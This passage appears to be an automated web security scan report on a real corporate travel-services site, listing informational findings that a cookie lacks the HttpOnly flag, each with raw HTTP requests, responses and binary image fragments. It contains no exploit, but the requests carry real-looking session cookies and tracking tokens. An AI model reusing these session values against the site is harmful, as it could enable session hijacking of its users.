X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:35 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:03 GMT;path=/
Content-Length: 16140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.7. http://www2.starcite.com/starcite/customers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/customers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/customers HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:12:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:12:10 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:41 GMT;path=/
Content-Length: 20570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.8. http://www2.starcite.com/starcite/destinationsolutions/finddestinations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/destinationsolutions/finddestinations

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/destinationsolutions/finddestinations HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:11:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=54
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:50 GMT;path=/
Content-Length: 36037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.9. http://www2.starcite.com/starcite/elqNow/elqCfg.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/elqNow/elqCfg.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/elqNow/elqCfg.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:18 GMT
Server: Apache
Last-Modified: Wed, 28 Jan 2009 17:46:02 GMT
ETag: "1000000002e6e-bf3-4618e8b9fa238"
Accept-Ranges: bytes
Content-Length: 3059
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:44 GMT;path=/

//------------------------------------------------------
// Copyright Eloqua Corporation.
//
var elqSiteID = '1142';
var elqVer = 'v200';
//
var elqERoot = 'now.eloqua.com/';
var elqSecERoot =
...[SNIP]...

2.10. http://www2.starcite.com/starcite/elqNow/elqImg.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/elqNow/elqImg.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/elqNow/elqImg.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:20 GMT
Server: Apache
Last-Modified: Wed, 28 Jan 2009 17:46:10 GMT
ETag: "1000000002e74-3bf-4618e8c1b9be4"
Accept-Ranges: bytes
Content-Length: 959
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:46 GMT;path=/

// Copyright Eloqua Corporation.
var elqWDt = new Date(20020101);
var elqDt = new Date();
var elqMs = elqDt.getMilliseconds();
var elqTzo = elqWDt.getTimezoneOffset();
var elqRef2 = '';
if (type
...[SNIP]...

2.11. http://www2.starcite.com/starcite/files/SIMPLIFY2.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/SIMPLIFY2.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/SIMPLIFY2.png HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:30 GMT
Server: Apache
Last-Modified: Mon, 04 Oct 2010 15:36:17 GMT
ETag: "10000000033a0-274c-491cc4e25bf26"
Accept-Ranges: bytes
Content-Length: 10060
Content-Type: image/png
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:56 GMT;path=/

.PNG
.
...IHDR...Z...[.....|......    pHYs.........g..R....tIME..
.."..E......tEXtAuthor....H....tEXtDescription..    !#...
tEXtCopyright....:....tEXtCreation time.5..    ...    tEXtSoftware.]p.:....tEXtDisclai
...[SNIP]...

2.12. http://www2.starcite.com/starcite/files/Xerox_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/Xerox_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/Xerox_logo.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:27 GMT
Server: Apache
Last-Modified: Mon, 03 Nov 2008 13:37:59 GMT
ETag: "1000000002306-820-45ac90e26b82c"
Accept-Ranges: bytes
Content-Length: 2080
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:53 GMT;path=/

GIF87ad........,.......Zd....>D....v|.....<....jt.......>L..,.............Zd.......v|..<....&4.......N\.R\....jt..........&4....ft..........:D.bl.~.....FT.~.....FT.:D...."4.......&4.......r|..,.......
...[SNIP]...

2.13. http://www2.starcite.com/starcite/files/garland_favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/garland_favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/garland_favicon.ico HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:45 GMT
Server: Apache
Last-Modified: Tue, 26 Aug 2008 00:53:00 GMT
ETag: "1000000002281-e36-45552534bd300"
Accept-Ranges: bytes
Content-Length: 3638
Content-Type: image/x-icon
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:20:11 GMT;path=/

..............h...&... ..............(....... ...........@......................................B...........`...#...R...............p................|..:.......L...W...........v...b.......(....... .
...[SNIP]...

2.14. http://www2.starcite.com/starcite/files/garland_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/garland_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/garland_logo.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:22 GMT
Server: Apache
Last-Modified: Wed, 27 Aug 2008 18:45:00 GMT
ETag: "1000000002282-b42-455756ae88300"
Accept-Ranges: bytes
Content-Length: 2882
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:47 GMT;path=/

GIF89a..(.............FFF........................sss???rrrcccbbb..................SSS...]]]...tttKKK...{{{.......................................hhh...qqq........................^^^.........|||}}}....
...[SNIP]...

2.15. http://www2.starcite.com/starcite/files/icons/uploaded_images/browser-webbased-app-_icon_sm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/icons/uploaded_images/browser-webbased-app-_icon_sm.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/icons/uploaded_images/browser-webbased-app-_icon_sm.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:42 GMT
Server: Apache
Last-Modified: Wed, 22 Oct 2008 08:25:00 GMT
ETag: "1000000002337-8b5-459d348ba8f00"
Accept-Ranges: bytes
Content-Length: 2229
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:07 GMT;path=/

GIF89aF.F............z...'................<.........r................aN..+....q......D.......o...D.....Y..e..........T9.......<;.......N...........7.....B..Q..Z..u......]....................J....}....
...[SNIP]...

2.16. http://www2.starcite.com/starcite/files/icons/uploaded_images/destination-direction_icon_sm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/icons/uploaded_images/destination-direction_icon_sm.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/icons/uploaded_images/destination-direction_icon_sm.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:43 GMT
Server: Apache
Last-Modified: Wed, 22 Oct 2008 08:57:00 GMT
ETag: "100000000233f-a22-459d3bb2b6f00"
Accept-Ranges: bytes
Content-Length: 2594
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:09 GMT;path=/

GIF89aF.F....;.............H).......k..................T..#..m..R........B..F....................v........`.......................,................z............\.....c........$.................z......
...[SNIP]...

2.17. http://www2.starcite.com/starcite/files/icons/uploaded_images/network-suppliers-group_icon_sm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/icons/uploaded_images/network-suppliers-group_icon_sm.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/icons/uploaded_images/network-suppliers-group_icon_sm.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:42 GMT
Server: Apache
Last-Modified: Wed, 22 Oct 2008 08:45:00 GMT
ETag: "1000000002366-a4c-459d390411b00"
Accept-Ranges: bytes
Content-Length: 2636
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:07 GMT;path=/

GIF89aF.F.......z.....&....\......].....=..........L......%.....c..........."....................S.....;..........c...j..............j................i...o........r..0....a..............}.....n..A....
...[SNIP]...

2.18. http://www2.starcite.com/starcite/files/icons/uploaded_images/support-chat-forum_icon_sm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/icons/uploaded_images/support-chat-forum_icon_sm.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/icons/uploaded_images/support-chat-forum_icon_sm.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:43 GMT
Server: Apache
Last-Modified: Wed, 22 Oct 2008 08:50:00 GMT
ETag: "100000000237c-79e-459d3a222be00"
Accept-Ranges: bytes
Content-Length: 1950
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:09 GMT;path=/

GIF89aF.F............w..,3..p....9..................R..........X..................c....e.....a.........3..E....[...w.....\...........Z..........L..................j.....x.............n...D...........p
...[SNIP]...

2.19. http://www2.starcite.com/starcite/files/kblog_0.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/kblog_0.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/kblog_0.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:30 GMT
Server: Apache
Last-Modified: Wed, 06 Jan 2010 18:39:39 GMT
ETag: "1000000003143-2d3c-47c8346ea7303"
Accept-Ranges: bytes
Content-Length: 11580
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:56 GMT;path=/

......JFIF.............C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;..........."..............................
...[SNIP]...

2.20. http://www2.starcite.com/starcite/files/logo_2010_vuc.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/logo_2010_vuc.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/logo_2010_vuc.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:30 GMT
Server: Apache
Last-Modified: Tue, 27 Jul 2010 22:43:11 GMT
ETag: "10000000032ca-1286-48c6639d9c317"
Accept-Ranges: bytes
Content-Length: 4742
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:56 GMT;path=/

......JFIF.....`.`......Exif..II*..............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222.......}.."......
...[SNIP]...

2.21. http://www2.starcite.com/starcite/files/nbtafoundation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/nbtafoundation.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/nbtafoundation.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:30 GMT
Server: Apache
Last-Modified: Thu, 12 Aug 2010 18:35:03 GMT
ETag: "20000000032cb-f1c-48da49fdeed08"
Accept-Ranges: bytes
Content-Length: 3868
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:56 GMT;path=/

GIF89aW.W.....<..:..=..@..A.    *o.1}.5..:..:..=.    >.
@..C.    E..J..J..1s.<~.@..C..G..I..K..O..R..6x.:..B..H..K..M..J..R..P..P..t."T.!R. V.$|.$y.%..)F.+N.(T.(\.)Z.+_.*{.*..)../..,..2[.0].1c.5e.1..1..2..1..4
...[SNIP]...

2.22. http://www2.starcite.com/starcite/files/partner_pfizer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/partner_pfizer.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/partner_pfizer.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:44 GMT
Server: Apache
Last-Modified: Mon, 01 Dec 2008 17:52:22 GMT
ETag: "10000000022d2-366-45cffdf7bfc15"
Accept-Ranges: bytes
Content-Length: 870
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:10 GMT;path=/

